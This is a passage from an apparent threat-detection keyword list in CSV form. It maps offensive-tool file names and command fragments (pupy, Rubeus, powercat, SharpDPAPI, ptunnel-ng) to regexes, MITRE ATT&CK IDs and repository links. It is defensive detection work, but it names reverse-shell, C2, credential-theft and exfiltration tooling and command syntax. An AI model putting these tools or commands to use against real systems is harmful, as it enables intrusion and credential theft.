TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* powercat.ps1",".{0,1000}\spowercat\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* powercat.ps1*",".{0,1000}\spowercat\.ps1.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","10","10","2034","462","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z" "* Powermad.ps1*",".{0,1000}\sPowermad\.ps1.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "* PowerTools.ps1*",".{0,1000}\sPowerTools\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "* PowerUp.ps1*",".{0,1000}\sPowerUp\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* ppid_spoofing.exe*",".{0,1000}\sppid_spoofing\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* PPLmedic.exe*",".{0,1000}\sPPLmedic\.exe.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "* pptp-version.nse*",".{0,1000}\spptp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* preauthscan /users:*",".{0,1000}\spreauthscan\s\/users\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* prepare.sh shell/mod_*.htaccess*",".{0,1000}\sprepare\.sh\sshell\/mod_.{0,1000}\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "* --preset all -o syscalls_all*",".{0,1000}\s\-\-preset\sall\s\-o\ssyscalls_all.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","0","N/A","N/A","10","1143","156","2023-12-23T11:07:19Z","2022-03-07T18:56:21Z" "* --preset common -o syscalls_common*",".{0,1000}\s\-\-preset\scommon\s\-o\ssyscalls_common.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","0","N/A","N/A","10","1143","156","2023-12-23T11:07:19Z","2022-03-07T18:56:21Z" "* PrincipalsAllowedToDelegateToAccount *",".{0,1000}\sPrincipalsAllowedToDelegateToAccount\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* printerbug.py*",".{0,1000}\sprinterbug\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* printing the golden data, format inspired by Responder :D*",".{0,1000}\sprinting\sthe\sgolden\sdata,\sformat\sinspired\sby\sResponder\s\:D.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "* Priv_Esc.sh*",".{0,1000}\sPriv_Esc\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "* --priv-esc*",".{0,1000}\s\-\-priv\-esc.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* privesc.ps1*",".{0,1000}\sprivesc\.ps1.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege Escalation","https://github.com/enjoiz/Privesc","1","0","N/A","10","5","469","90","2023-03-06T10:27:00Z","2015-11-19T13:22:01Z" "* PrivescCheck.ps1*",".{0,1000}\sPrivescCheck\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* Process spawned with stolen token!*",".{0,1000}\sProcess\sspawned\swith\sstolen\stoken!.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "* processinjection.exe*",".{0,1000}\sprocessinjection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* proxychains *",".{0,1000}\sproxychains\s.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "* ProxyStream *Stowaway*",".{0,1000}\sProxyStream\s.{0,1000}Stowaway.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "* ps /target:*.xml /unprotect*",".{0,1000}\sps\s\/target\:.{0,1000}\.xml\s\/unprotect.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "* psexec_merged.bin*",".{0,1000}\spsexec_merged\.bin.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "* psgetsys.ps1*",".{0,1000}\spsgetsys\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* psgetsys.ps1*",".{0,1000}\spsgetsys\.ps1.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","0","N/A","10","4","320","83","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z" "* PSLessExec.exe*",".{0,1000}\sPSLessExec\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "* ptt /ticket:*",".{0,1000}\sptt\s\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* ptunnel-ng*",".{0,1000}\sptunnel\-ng.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "* --publickey * --ecmdigits 25 --verbose --private*",".{0,1000}\s\-\-publickey\s.{0,1000}\s\-\-ecmdigits\s25\s\-\-verbose\s\-\-private.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --publickey * --uncipherfile ./ciphered\_file*",".{0,1000}\s\-\-publickey\s.{0,1000}\s\-\-uncipherfile\s\.\/ciphered\\_file.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* puppet-naivesigning.nse*",".{0,1000}\spuppet\-naivesigning\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* PupyCredentials*",".{0,1000}\sPupyCredentials.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* pupylib.*",".{0,1000}\spupylib\..{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* pupysh.py*",".{0,1000}\spupysh\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* PupySocketStream*",".{0,1000}\sPupySocketStream.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* PupyTCPClient*",".{0,1000}\sPupyTCPClient.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* PupyTCPServer*",".{0,1000}\sPupyTCPServer.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* PupyWebServer*",".{0,1000}\sPupyWebServer.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* PupyWebSocketClient*",".{0,1000}\sPupyWebSocketClient.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* PupyWebSocketServer*",".{0,1000}\sPupyWebSocketServer.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* pupyx64.exe*",".{0,1000}\spupyx64\.exe.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* pupyx64.lin*",".{0,1000}\spupyx64\.lin.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* pupyx86.exe*",".{0,1000}\spupyx86\.exe.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* push_payload*",".{0,1000}\spush_payload.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* putterpanda.py*",".{0,1000}\sputterpanda\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "* pwcrack.sh*",".{0,1000}\spwcrack\.sh.{0,1000}","offensive_tool_keyword","nsa-rules","Password cracking rules and masks for hashcat that I generated from cracked passwords.","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/NSAKEY/nsa-rules","1","0","N/A","10","6","513","124","2017-01-03T11:53:25Z","2016-02-15T20:49:32Z" "* pwn_php.me*",".{0,1000}\spwn_php\.me.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","9","4","359","72","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "* pwn_python.me*",".{0,1000}\spwn_python\.me.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","9","4","359","72","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "* Pwn3d!*",".{0,1000}\sPwn3d!.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* pyasn1 *",".{0,1000}\spyasn1\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 